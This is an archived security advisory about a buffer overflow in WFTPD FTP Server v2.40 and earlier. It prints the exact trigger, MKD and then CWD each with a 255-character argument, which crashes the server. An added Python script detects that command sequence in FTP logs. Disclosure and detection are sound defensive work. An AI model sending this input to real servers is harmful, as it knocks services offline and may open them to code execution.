WFTPD Server v2.34, v2.40 and earlier are vulnerable to a remotely exploitable buffer overflow. This can result in a denial of service and, at worst, in arbitrary code being executed on the system.
From: Luciano Martins <luck@USSRBACK.COM>
Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability
We found that WFTPD Server v2.34, v2.40 and earlier are vulnerable to a
remotely exploitable buffer overflow. This can result in a denial of service
and at worst in arbitrary code being executed on the system.
The vulnerability is the conjunction of two large commands, MKD and CWD,
when each is passed as its argument a string of exactly 255 characters. If
these two large commands are passed in order, the program crashes.
Tested on: Windows 98 / Windows NT
Example:
First command
MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Second command
CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Crash.....Overflow.
Luck Martins
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
WWW.USSRBACK.COM
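A defender's check for the sequence described in the advisory, as an added example that is not part of the original post: it scans FTP command logs for a session that sends MKD and later CWD, each with an argument of 255 or more characters. The log line format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed log format (constructed for this example):
#   "<session-id> <raw FTP command line>"
LINE_RE = re.compile(
    r"^(?P<sid>\S+)\s+(?P<verb>[A-Za-z]{3,4})(?: (?P<arg>.*))?$"
)

ARG_LIMIT = 255  # argument length named in the advisory


def find_mkd_cwd_sequences(log_lines, limit=ARG_LIMIT):
    """Return session ids (in order of detection) where an MKD with an
    argument of at least `limit` characters is later followed by a CWD
    whose argument is also at least that long."""
    pending_mkd = set()  # sessions that already sent an oversized MKD
    flagged = []
    for raw in log_lines:
        m = LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # not a command line in the assumed format
        sid = m.group("sid")
        verb = m.group("verb").upper()  # FTP verbs are case-insensitive
        arg = m.group("arg") or ""
        if len(arg) < limit:
            continue  # only oversized arguments are of interest
        if verb == "MKD":
            pending_mkd.add(sid)
        elif verb == "CWD" and sid in pending_mkd and sid not in flagged:
            flagged.append(sid)
    return flagged


# Constructed sample log, not captured traffic.
SAMPLE_LOG = [
    "s1 USER anonymous",
    "s1 MKD " + "a" * 255,
    "s2 MKD uploads",
    "s2 CWD " + "a" * 255,  # long CWD alone: no preceding long MKD
    "s1 cwd " + "a" * 255,  # completes the MKD -> CWD pair for s1
    "s3 MKD " + "b" * 254,  # one character short of the limit
    "s3 CWD " + "b" * 254,
]

if __name__ == "__main__":
    print(find_mkd_cwd_sequences(SAMPLE_LOG))
```

The threshold is treated as a lower bound rather than an exact match, which is a choice made for this example; the advisory itself only reports the 255-character case.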